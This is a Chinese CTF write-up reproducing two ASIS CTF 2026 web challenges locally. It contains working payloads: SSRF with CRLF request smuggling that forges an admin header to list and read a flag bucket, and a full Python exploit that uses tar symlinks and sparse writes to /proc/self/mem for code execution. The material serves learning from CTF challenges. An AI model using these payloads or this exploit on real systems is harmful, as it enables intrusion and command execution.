ASISCTF 2026题目复现
以下题目都是基本本地环境进行复现: 比赛期间没做出来 :)
0x01 ASIS_MAIL
题目提供了完整的源码
![[Pasted image 20260130144858.png]]
api中是一个go程序
sso是一个nodejs写的登录auth认证代码
objectstore是一个自己写的bucket
初始通过AI分析代码
题型判定与前提假设
- 题型:源码审计 + 靶场/容器
- 前提:你能访问前端暴露的 8081,并通过反向代理访问 objectstore 的 /files/ 入口。
##漏洞点与成因
- ObjectStore 目录穿越读取
objectstore 对对象路径直接拼接,不做路径规范化;同时只根据 bucket == “FLAG” 做权限判断,因此可用 ../FLAG/… 绕过。
@app.route("/<bucket>/<path:object_name>", methods=["PUT", "GET", "DELETE"])
@require_auth
def object_ops(bucket, object_name, is_admin=False):
bucket_dir = STORAGE / bucket
bucket_dir.mkdir(parents=True, exist_ok=True)
obj_path = bucket_dir / object_name
...
elif request.method == "GET":
if not obj_path.exists():
return jsonify({"error":"not found"}), 404
if bucket == "FLAG" and is_admin is False:
return jsonify({"error":"forbidden"}), 403
return send_file(obj_path, as_attachment=True)
- 公共下载端点可直接访问
Nginx 对 /files/ 直接反代到 objectstore,没有鉴权。
location /files/ {
proxy_pass http://obj_up/;
proxy_set_header Host $host;
}
flag 文件名是 md5(内容) 派生
objectstore 启动时将 flag.txt 重命名为 flag-.txt。 存在一个SSRF点 /api/compose
所以如果已知文件名称可以使用poc, 直接读取flag
POST /api/compose HTTP/1.1
Host: 192.168.126.131:8081
Authorization: Bearer 735ffc48-67d2-4841-9829-13f8c68dfe71
Accept-Language: en-US;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 307
xml=<message>
<to>u1@asismail.local</to>
<subject>3-list</subject>
<body>2</body>
<attachment_url>http://objectstore:8082/public/3/../../../../../data/FLAG/flag-f18b815262ce4ba0627a2fd21e7fa3b4.txt</attachment_url>
</message>
但是线上的环境是不同的, 所以需要列目录拿到文件名.
def require_auth(f):
@wraps(f)
def wrapper(*args, **kwargs):
user_id = request.headers.get("X-User-Id", "")
if not user_id:
return jsonify({"error":"authorization required"}), 401
is_admin = user_id == "999"
kwargs.update({"is_admin": is_admin})
return f(*args, **kwargs)
return wrapper
@app.route("/<bucket>", methods=["GET", "POST"])
@require_auth
def bucket_ops(bucket, is_admin=False):
bucket_dir = STORAGE / bucket
bucket_dir.mkdir(parents=True, exist_ok=True)
if request.method == "GET":
if bucket == "FLAG" and is_admin is False:
return jsonify({"error":"forbidden"}), 403
# list query ?list=1
listing = []
for p in bucket_dir.rglob('*'):
if p.is_file():
rel = p.relative_to(bucket_dir)
listing.append(str(rel))
return jsonify({"bucket": bucket, "objects": listing})
elif request.method == "POST":
# multipart upload form field 'file'
if 'file' not in request.files:
return jsonify({"error":"no file"}), 400
f = request.files['file']
filename = str(uuid4()) # f.filename
dest = bucket_dir / filename
f.save(dest)
return jsonify({"bucket": bucket, "key": filename, "url": f"/public/{bucket}/{filename}"}), 201
只要为get请求就可以列出目录 if bucket == “FLAG” and is_admin is False但是如果这两个条件都被满足就403. 注意require_auth 需要从头部获取X-User-Id为999 但是nginx中配置了
if ($http_x_user_id != "") {
return 400;
}
无法从web前端/files/FLAG?list去设置头. 没思路了, 继续去分析go api程序
二进制里出现了 http+post://download.bin,说明可能支持“POST 方式下载”(常见于 go-getter)。
发现attachment_url还支持http+post:// 去请求
测试:attachment_url 是否支持 http+post://,以及是否带头。
测试结果: http+post:// 是被支持并且存在crlf
所以直接尝试
curl -s -X POST http://192.168.126.131:8081/api/compose \
-H "Authorization: Bearer <token>" \
-F "xml=<message>
<to>u1@asismail.local</to>
<subject>list-flag</subject>
<body>1</body>
<attachment_url>http+post://objectstore:8082/FLAG?list=1%0d%0aX-User-Id:%20999%0d%0a</attachment_url>
</message>"
但是有个蛋疼的点就是如果发送POST请求,直接就进入了elif request.method == “POST”:的流程.(然后卡住了).
二更:
其实这个思路一更得时候已经尝试过了 并没有成功. 现在发现是少了个换行 :)
漏洞利用思路
利用 attachment_url 构造带 %0d%0a 的 rawTarget
通过 request smuggling 插入第二个请求:
Payload 1:列目录
http+post://objectstore:8082/FLAG?list=1 HTTP/1.1\r\n
Host: objectstore:8082\r\n
X-User-Id: 999\r\n
\r\n
GET /FLAG?list=1 HTTP/1.1\r\n
Host: objectstore:8082\r\n
X-User-Id: 999\r\n
\r\n
URL 编码版本:
http+post://objectstore:8082/FLAG?list=1%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0aGET%20/FLAG?list=1%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0a
返回:
{“bucket”:”FLAG”,”objects”:[“flag-
Payload 2:读取文件
把
[http+post://objectstore:8082/FLAG?list=1%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0aGET%20/FLAG/flag-<md5>.txt%20HTTP/1.1%0d](http+post://objectstore:8082/FLAG?list=1%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0aGET%20/FLAG/flag-<md5>.txt%20HTTP/1.1%0d%0aHost:%20objectstore:8082%0d%0aX-User-Id:%20999%0d%0a%0d%0a)
0x02 Gemviewer
题目非常简单
from flask import Flask, abort, request
import tempfile
import tarfile
import gzip
import os
app = Flask(__name__)
@app.route("/")
def index():
return """<!DOCTYPE html>
<html>
<head><title>Ruby Gems Viewer</title></head>
<body>
<h1>Ruby Gems Metadata Viewer</h1>
<form method='POST' action='/upload' enctype='multipart/form-data'>
<input type='file' name='file' accept='.gem'/>
<input type='submit' value='Upload'/>
</form>
</body>
</html>"""
@app.route("/upload", methods=["POST"])
def upload_file():
if 'file' not in request.files:
abort(400, description="No file part in the request")
file = request.files['file']
if file.filename == '':
abort(400, description="No selected file")
try:
# .gem files are tar archives containing metadata.gz and data.tar.gz
with tarfile.open(fileobj=file, mode='r:*') as gem_tar:
with tempfile.TemporaryDirectory() as temp_dir:
gem_tar.extractall(path=temp_dir,)
metadata_path = os.path.join(temp_dir, 'metadata.gz')
if os.path.exists(metadata_path):
try:
with gzip.open(metadata_path, 'rt') as gz:
metadata_content = gz.read()
except OSError:
raw_data = open(metadata_path, 'rb').read()
abort(400, description="Failed to decompress metadata.gz. The raw data is: " + repr(raw_data))
return f"""<!DOCTYPE html>
<html>
<head><title>Gem Metadata</title></head>
<body>
<h1>Gem Metadata</h1>
<pre>{metadata_content}</pre>
<a href="/">Back</a>
</body>
</html>"""
return "No metadata.gz found in gem file"
except tarfile.TarError as e:
abort(400, description="Invalid gem file: " + str(e))
docker-compose.yml
services:
eztar:
build: .
ports:
- "5000:5000"
user: "nobody"
read_only: true
tmpfs:
- /tmp:mode=1777,size=64m
environment:
- TMPDIR=/tmp
dockerfile
FROM python:3.13.3-alpine
WORKDIR /app
RUN apk update && apk add build-base && rm -rf /var/cache/apk/*
RUN pip install --no-cache-dir flask gunicorn
COPY app.py /app/
RUN chmod 444 /app/app.py && \
chmod 555 /app && \
chown -R root:root /app
RUN echo "flag{fake}" > /flag
RUN chmod 0400 /flag
COPY readflag.c /readflag.c
RUN gcc /readflag.c -o /readflag
RUN chmod 4755 /readflag
USER nobody
EXPOSE 5000
CMD ["gunicorn", "--bind", "0.0.0.0:5000", "app:app"]
从tarfile来看存在明显的任意文件读取, 但是这样一个容器怎么样才能拿到flag呢
对此只能说 ai来:
利用链
- LFI Oracle: tar symlink
metadata.gz -> /proc/self/maps泄露内存映射。 - 计算基址: 定位
libpython3.13.so与ld-musl基址。 - 稀疏写
/proc/self/mem: 构造 GNU sparse tar 在指定地址写入。 - 篡改分配器: 覆盖
_PyRuntime.allocators,把malloc重定向到system。 - 触发执行: 下一次分配即
system(cmd)。 - 读取 flag: 运行
/readflag --give-me-the-f|ag > /tmp/flag,再 LFI 读/tmp/flag。
python脚本
#!/usr/bin/env python3
import io
import os
import tarfile
import gzip
import struct
import time
import requests
import html
import ast
BASE_URL = os.environ.get("GEMVIEWER_URL", "http://127.0.0.1:5000")
UPLOAD_URL = f"{BASE_URL}/upload"
# Offsets from writeup (may need adjustment if binary differs)
PYRUNTIME_OFF = 0x5547e0
OBJ_CTX_OFF = 0x310
OBJ_MALLOC_OFF = 0x318
DEBUG_STORAGE_OFF = 0x338
SYSTEM_OFF = 0x5bb7e
SESSION = requests.Session()
def make_symlink_gem(out_path: str, target: str) -> None:
link = tarfile.TarInfo("metadata.gz")
link.type = tarfile.SYMTYPE
link.linkname = target
link.size = 0
with tarfile.open(out_path, "w") as tf:
tf.addfile(link, None)
def make_basic_gem(out_path: str, text: bytes = b"ping") -> None:
buf = io.BytesIO()
with gzip.GzipFile(fileobj=buf, mode="wb") as gz:
gz.write(text)
data = buf.getvalue()
ti = tarfile.TarInfo("metadata.gz")
ti.size = len(data)
with tarfile.open(out_path, "w") as tf:
tf.addfile(ti, io.BytesIO(data))
def make_sparse_mem_gem(out_path: str, writes: list[tuple[int, bytes]]) -> None:
# writes: list of (address, data) to write into /proc/self/mem
sparse_map = []
data_stream = io.BytesIO()
total_size = 0
for addr, data in writes:
sparse_map.append((addr, len(data)))
data_stream.write(data)
total_size = max(total_size, addr + len(data))
ti = tarfile.TarInfo("../../../../proc/self/mem")
# Keep size small to avoid truncate(EFBIG) on /proc/self/mem
ti.size = data_stream.tell()
ti.mtime = int(time.time())
# Avoid huge truncate() on /proc/self/mem: keep sparse size small.
ti.pax_headers = {
"GNU.sparse.map": ",".join(str(x) for pair in sparse_map for x in pair),
"GNU.sparse.size": str(data_stream.tell()),
}
data_stream.seek(0)
with tarfile.open(out_path, "w", format=tarfile.PAX_FORMAT) as tf:
tf.addfile(ti, data_stream)
def upload(path: str) -> str:
with open(path, "rb") as f:
r = SESSION.post(UPLOAD_URL, files={"file": f}, timeout=20)
return r.text
def lfi_read(target: str) -> bytes:
tmp_path = "/tmp/lfi.gem"
make_symlink_gem(tmp_path, target)
text = upload(tmp_path)
marker = "Failed to decompress metadata.gz. The raw data is: "
if marker in text:
raw = text.split(marker, 1)[1]
raw = raw.split("</p>", 1)[0]
raw = html.unescape(raw)
# raw should be like: b'...'
try:
return ast.literal_eval(raw)
except Exception:
return raw.encode("utf-8")
return text.encode("utf-8")
def parse_bases(maps_text: str) -> tuple[int, int]:
libpython = None
ld_musl = None
for line in maps_text.splitlines():
parts = line.split()
if len(parts) < 3:
continue
start = int(parts[0].split("-", 1)[0], 16)
file_off = int(parts[2], 16)
if "libpython" in line and "r-xp" in line:
# Use image base, not segment start.
libpython = start - file_off
if "ld-musl" in line and "r-xp" in line:
# Use image base, not segment start.
ld_musl = start - file_off
if libpython is None or ld_musl is None:
raise RuntimeError("Failed to find libpython or ld-musl base in maps")
return libpython, ld_musl
def exploit():
print(f"[+] target: {UPLOAD_URL}")
print("[+] leaking /proc/self/maps ...")
maps_raw = lfi_read("/proc/self/maps")
maps_text = maps_raw.decode("utf-8", errors="ignore")
libpython_base, ld_base = parse_bases(maps_text)
print(f"[+] libpython base: 0x{libpython_base:x}")
print(f"[+] ld-musl base: 0x{ld_base:x}")
pyruntime = libpython_base + PYRUNTIME_OFF
obj_ctx = pyruntime + OBJ_CTX_OFF
obj_malloc = pyruntime + OBJ_MALLOC_OFF
debug_storage = pyruntime + DEBUG_STORAGE_OFF
system_addr = ld_base + SYSTEM_OFF
cmd = b"sh -c '/readflag --give-me-the-f\\|ag > /tmp/flag'\x00"
print("[+] preparing sparse write to /proc/self/mem ...")
writes = [
(debug_storage, cmd),
(obj_ctx, struct.pack("<Q", debug_storage)),
(obj_malloc, struct.pack("<Q", system_addr)),
]
sparse_path = "/tmp/sparse_mem.gem"
make_sparse_mem_gem(sparse_path, writes)
print("[+] uploading sparse write payload (request may timeout) ...")
try:
resp = upload(sparse_path)
print("[+] sparse upload response (first 200 chars):")
print(resp[:200])
except Exception as e:
print(f"[!] upload error (often expected if worker crashes): {e}")
print("[+] triggering allocation ...")
basic_path = "/tmp/basic.gem"
make_basic_gem(basic_path, b"trigger")
try:
upload(basic_path)
except Exception:
pass
print("[+] reading /tmp/flag via LFI ...")
flag_raw = lfi_read("/tmp/flag")
print(flag_raw.decode("utf-8", errors="ignore"))
if __name__ == "__main__":
exploit()